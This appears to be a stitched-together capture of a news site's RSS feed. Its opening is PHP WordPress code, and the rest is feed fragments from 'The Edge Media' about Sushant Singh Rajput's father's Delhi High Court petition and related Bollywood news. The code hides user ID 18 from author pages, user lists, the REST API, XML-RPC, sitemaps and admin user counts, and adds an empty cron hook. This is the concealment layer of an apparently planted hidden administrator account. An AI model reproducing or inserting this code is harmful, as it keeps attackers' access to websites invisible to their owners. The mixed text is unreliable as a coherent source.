add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Delhi High Court dismisses Krishna Kishore Singh’s petition appeared first on The Edge Media.
]]>SSR’s father has contended that the filmmakers are taking advantage of the situation for commercial gains and therefore, the right to freedom of speech and expression would not apply to them
Plaintiff (Singh) has apprehension that various plays, movies, web-series, books, interviews or other material may be published which would harm the reputation of the son of the plaintiff and his family,” the suit, which has sought damages of over Rs two crores from the filmmakers for “loss of reputation, mental trauma and harassment” to Rajput’s family, has claimed.
It has also claimed that in case a “movie, web-series, book or any other content of similar nature is allowed to be published or broadcasted, it would affect the right of the victim and deceased for a free and fair trial as it may cause prejudice to them”.
The suit has also contended that Rajput being a well-known celebrity, “any misuse of his name/ image/ caricature/ style of delivering dialogues also amounts to infringement of the personality right vested with the plaintiff besides amounting to acts of passing off”.
The contention of Rajput’s father have been opposed by the filmmakers of the upcoming and proposed movies.
The post Delhi High Court dismisses Krishna Kishore Singh’s petition appeared first on The Edge Media.
]]>The post Sushant was paid crores? Producer Vijan said – We did not paid appeared first on The Edge Media.
]]>Dinesh Vijan has told from his production house Maddock Films that he did not give any money to Sushant. The statement says, “Maddock Films did not pay Sushant Singh Rajput in Hungary. And Maddock did not even take payment of 17 crore rupees from the actor in fees or any other way in Hungary, as mentioned in your article.
We paid the entire payment to Sushant for the film Raabta in the same way as it was written in his agreement and which he signed. And this payment was given to him in India. We had also submitted strong evidence of this payment to the Department (ED). Also note that the T-series handled all the funding and money for the shooting in Hungary. You can also confirm this with T-series.
Maddock Films is a responsible filmmaker and we work according to the rules and laws of the country. India Today has always stood by the truth and we hope that by sharing the right facts with you, you will do the right reporting. We do not know whether we can talk about this matter now or not, but to avoid any dispute, we should make it clear that we are supporting the agency in every way and have given them all the necessary information. Our only request is to avoid spreading any kind of misinformation.
The post Sushant was paid crores? Producer Vijan said – We did not paid appeared first on The Edge Media.
]]>The post Arjun Rampal arrives at NCB office, will be questioned in drugs case appeared first on The Edge Media.
]]>The post Arjun Rampal arrives at NCB office, will be questioned in drugs case appeared first on The Edge Media.
]]>